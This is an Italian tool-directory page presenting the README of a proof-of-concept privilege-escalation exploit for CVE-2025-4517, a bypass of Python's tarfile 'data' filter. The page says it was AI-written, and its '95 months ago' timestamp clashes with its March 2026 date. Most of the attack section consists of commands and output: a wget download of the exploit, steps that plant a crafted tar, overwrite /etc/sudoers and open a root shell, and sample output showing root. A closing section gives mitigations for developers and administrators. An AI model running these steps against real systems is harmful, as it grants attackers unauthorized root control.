Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-4517-POC — Script di escalation dei privilegi per CVE-2025-4517 | Kitploit
Strumenti/GitHubGitHub/azureadtrent/cve-2025-4517-poc
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitCTFApprendimento e FormazioneBinary Exploitation
GitHubazureadtrent/cve-2025-4517-poc

CVE-2025-4517-POC

Script di escalation dei privilegi per CVE-2025-4517

Vedi Repository
95 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit CVE-2025-4517

NOTE

Questo exploit e descrizione sono scritti da AI. Se trovi un errore o un problema, per favore fammelo sapere! Questo exploit è stato testato e funziona correttamente. Grazie!

Panoramica

Questo exploit sfrutta CVE-2025-4517, una vulnerabilità critica nel modulo tarfile di Python che permette la scrittura arbitraria di file tramite una combinazione di path traversal tramite symlink e manipolazione di hardlink. Questo bypassa la protezione filter="data" introdotta in Python 3.12.

Dettagli della Vulnerabilità

  • ID CVE: CVE-2025-4517
  • Versioni Affette: Python 3.8.0 fino a 3.13.1
  • Punteggio CVSS: 9.3 (Critico)
  • Impatto: Scrittura arbitraria di file con privilegi elevati

Background Tecnico

La vulnerabilità sfrutta un difetto nel modo in cui tarfile.extractall() di Python gestisce l'interazione tra:

  1. Symlink – Utilizzati per creare path traversal al di fuori della directory di estrazione
  2. Hardlink – Utilizzati per referenziare file attraverso il percorso symlink evaso
  3. Bypass del Filtro – Il parametro filter="data" blocca i symlink diretti, ma la tecnica degli hardlink elude questa protezione

Flusso dell'Attacco

root@kitploit:~
1. Creare directory annidate profonde (path confusion)
   └─ Utilizza nomi di directory di 247 caratteri ripetuti per 16 livelli

2. Costruire una catena di symlink per il traversal
   └─ Crea symlink che risalgono attraverso l'albero delle directory

3. Symlink di fuga verso la directory target (/etc)
   └─ Il symlink finale punta al di fuori del confine di estrazione

4. Creare un hardlink che punta attraverso il symlink di fuga
   └─ Hardlink: "sudoers_link" → "escape/sudoers" → "/etc/sudoers"

5. Scrivere contenuto nell'hardlink
   └─ Scrivere su "sudoers_link" scrive effettivamente su /etc/sudoers

Componente Vulnerabile

Script: /opt/backup_clients/restore_backup_clients.py

root@kitploit:~
# Frammento di codice vulnerabile
with tarfile.open(backup_path, "r") as tar:
    tar.extractall(path=staging_dir, filter="data")

Permessi Sudo:

root@kitploit:~
wacky ALL=(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *

Dettagli del Sistema

  • Versione Python: 3.12.3 (Vulnerabile a CVE-2025-4517)

Utilizzo

Prerequisiti

  • Accesso utente con permessi sudo per lo script vulnerabile
  • Permesso di scrittura su /opt/backup_clients/backups/
  • Python 3 sulla macchina attaccante

Installazione

root@kitploit:~
# Scarica l'exploit
wget https://raw.githubusercontent.com/AzureADTrent/CVE-2025-4517-POC/refs/heads/main/CVE-2025-4517-POC.py
# Trasferiscilo nel sistema target

Esecuzione Base

root@kitploit:~
# Esegui l'exploit
./exploit.py

# Oppure con Python
python3 exploit.py

Passo-Passo Manuale

Se preferisci eseguire ogni passo manualmente:

root@kitploit:~
# 1. Crea il tar dell'exploit
python3 exploit.py --create-only

# 2. Distribuisci sul target
cp /tmp/cve_2025_4517_exploit.tar /opt/backup_clients/backups/backup_9999.tar

# 3. Esegui tramite lo script vulnerabile
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py \
  -b backup_9999.tar \
  -r restore_exploit

# 4. Verifica la modifica di sudoers
sudo cat /etc/sudoers | grep "$(whoami)"

# 5. Ottieni i permessi di root
sudo /bin/bash

Esempio di Output

root@kitploit:~
╔═══════════════════════════════════════════════════════════╗
║     CVE-2025-4517 Tarfile Exploit                         ║
║     Escalation di Privilegi tramite Bypass Symlink + Hardlink ║
╚═══════════════════════════════════════════════════════════╝

[*] Utente target: wacky
[*] Creazione tar exploit per l'utente: wacky
[*] Fase 1: Costruzione struttura directory annidata...
[*] Fase 2: Creazione catena symlink per path traversal...
[*] Fase 3: Creazione symlink di fuga verso /etc...
[*] Fase 4: Creazione hardlink verso /etc/sudoers...
[*] Fase 5: Scrittura voce sudoers...
[+] Exploit tar creato: /tmp/cve_2025_4517_exploit.tar
[*] Distribuzione exploit su: /opt/backup_clients/backups/backup_9999.tar
[+] Exploit distribuito con successo
[*] Attivazione estrazione tramite script vulnerabile...
[+] Backup: backup_9999.tar
[+] Directory stage: /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Estrazione completata in /opt/backup_clients/restored_backups/restore_pwn_9999
[+] Estrazione completata
[*] Verifica successo exploit...
[+] SUCCESSO! Utente 'wacky' aggiunto a sudoers
[+] Voce: wacky ALL=(ALL) NOPASSWD: ALL

============================================================
[+] SFRUTTAMENTO RIUSCITO!
[+] L'utente 'wacky' ora ha pieni privilegi sudo
[+] Ottieni root con: sudo /bin/bash
============================================================

[?] Avviare shell root ora? (s/n): s
[*] Avvio shell root...
[*] Esegui: sudo /bin/bash

root@box:/tmp# whoami
root
root@box:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

Flusso del Proof of Concept

Fase 1: Accesso Iniziale

  • Accesso all'utente

Fase 2: Escalation di Privilegi (Questo Exploit)

  • Identificare permessi sudo sullo script di ripristino backup
  • Riconoscere versione Python vulnerabile a CVE-2025-4517
  • Distribuire exploit tar per modificare /etc/sudoers
  • Ottenere accesso root

Mitigazione

Per Sviluppatori Python

  1. Aggiornare Python: Passare a Python 3.13.2+ o applicare patch di sicurezza
root@kitploit:~
   python3 --version  # Controlla la versione
  1. Validazione Aggiuntiva: Implementare validazione rigorosa sui contenuti dei tar
root@kitploit:~
   # Controlla membri sospetti prima dell'estrazione
   for member in tar.getmembers():
       if member.islnk() or member.issym():
           raise SecurityError("Symlink/hardlink non consentiti")
  1. Limitare Percorsi di Estrazione: Verificare che tutti i file estratti rimangano nei limiti
root@kitploit:~
   import os
   for member in tar.getmembers():
       member_path = os.path.join(extract_path, member.name)
       if not member_path.startswith(os.path.abspath(extract_path)):
           raise SecurityError("Path traversal rilevato")

Per Amministratori di Sistema

  1. Limitare Accesso sudo: Ridurre al minimo gli script eseguibili come root
root@kitploit:~
   # Rimuovere o limitare l'accesso sudo allo script di backup
   visudo
  1. Validazione Input: Validare gli archivi tar prima dell'elaborazione
root@kitploit:~
   # Controlla contenuto tar prima dell'estrazione
   tar -tzf archive.tar | grep -E '\.\./|^/'
  1. Monitoraggio Integrità File: Monitorare file critici come /etc/sudoers
root@kitploit:~
   # Configurare AIDE o simile IDS
   aide --check
  1. AppArmor/SELinux: Implementare controlli di accesso obbligatori

Riferimenti

Informazioni CVE

  • CVE-2025-4517 - NVD
  • CVE-2025-4138 - Vulnerabilità Correlata
  • Avviso di Sicurezza Python

Ricerca e Write-up

  • Avviso di Sicurezza Linux
  • Ricerca Sicurezza Google - GHSA-hgqp-3mmf-7h8f

PoC Pubblici

  • DesertDemons CVE-2025-4138-4517-POC
  • StealthByte CVE-2025-4517-poc
  • AnimePrincess420 PoC

Disclaimer Legale

Questo exploit è fornito solo a scopo educativo ed è destinato all'uso in:

  • Impegni di penetration testing autorizzati
  • Competizioni Capture The Flag (CTF) come HackTheBox
  • Ricerche di sicurezza in ambienti controllati
  • Divulgazione di vulnerabilità e sviluppo di patch

Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo codice.

Ricerca Originale: Molteplici ricercatori di sicurezza (vedi Riferimenti)

Licenza

Licenza MIT – Vedi file LICENSE per i dettagli


Ultimo Aggiornamento: Marzo 2026

Scarica lo strumento